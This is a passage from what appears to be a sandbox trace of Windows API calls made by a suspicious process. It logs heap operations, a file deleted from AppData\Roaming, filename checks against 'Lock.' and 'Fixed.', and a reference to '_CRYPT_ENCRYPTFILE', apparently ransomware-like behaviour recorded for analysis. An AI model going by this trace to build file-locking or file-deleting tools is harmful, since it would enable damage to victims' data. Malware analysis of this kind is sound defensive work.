RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0233.729] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/K KvEQBDpvTatLEa.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf", lpFilePart=0x8cedf4*="K KvEQBDpvTatLEa.swf") returned 0x34 [0233.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0233.729] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\k kveqbdpvtatlea.swf")) returned 0x20 [0233.730] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1722d2f0, ftCreationTime.dwHighDateTime=0x1d5eaeb, ftLastAccessTime.dwLowDateTime=0x8d8a7750, ftLastAccessTime.dwHighDateTime=0x1d5ed56, ftLastWriteTime.dwLowDateTime=0x8d8a7750, ftLastWriteTime.dwHighDateTime=0x1d5ed56, nFileSizeHigh=0x0, nFileSizeLow=0x67e3, dwReserved0=0x1, dwReserved1=0x1c, cFileName="K KvEQBDpvTatLEa.swf", cAlternateFileName="KKVEQB~1.SWF")) returned 0xa87490 [0233.730] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\k kveqbdpvtatlea.swf")) returned 1 [0233.732] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1722d2f0, ftCreationTime.dwHighDateTime=0x1d5eaeb, ftLastAccessTime.dwLowDateTime=0x8d8a7750, ftLastAccessTime.dwHighDateTime=0x1d5ed56, ftLastWriteTime.dwLowDateTime=0x8d8a7750, ftLastWriteTime.dwHighDateTime=0x1d5ed56, nFileSizeHigh=0x0, nFileSizeLow=0x67e3, dwReserved0=0x1, dwReserved1=0x1c, cFileName="K KvEQBDpvTatLEa.swf", cAlternateFileName="KKVEQB~1.SWF")) returned 0 [0233.732] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0233.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0233.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0233.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0233.732] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.733] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0233.733] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/K KvEQBDpvTatLEa.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf", lpFilePart=0x8cf650*="K KvEQBDpvTatLEa.swf") returned 0x34 [0233.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0233.733] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\K KvEQBDpvTatLEa.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\k kveqbdpvtatlea.swf")) returned 0xffffffff [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.734] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0233.734] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.734] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0233.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0233.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0233.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ljcsRI_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jcsRI_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csRI_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRI_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RI_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0233.735] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0233.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ljcsRI_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jcsRI_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csRI_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRI_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RI_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I_.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0233.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0233.737] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0233.737] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.737] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0233.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0233.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0233.738] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0233.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0233.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.740] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ljcsRI_.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d0bb030, ftCreationTime.dwHighDateTime=0x1d5e5c3, ftLastAccessTime.dwLowDateTime=0x3fa8d630, ftLastAccessTime.dwHighDateTime=0x1d5e50e, ftLastWriteTime.dwLowDateTime=0x3fa8d630, ftLastWriteTime.dwHighDateTime=0x1d5e50e, nFileSizeHigh=0x0, nFileSizeLow=0xb0ca, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ljcsRI_.swf", cAlternateFileName="")) returned 0xa87250 [0233.740] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0233.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 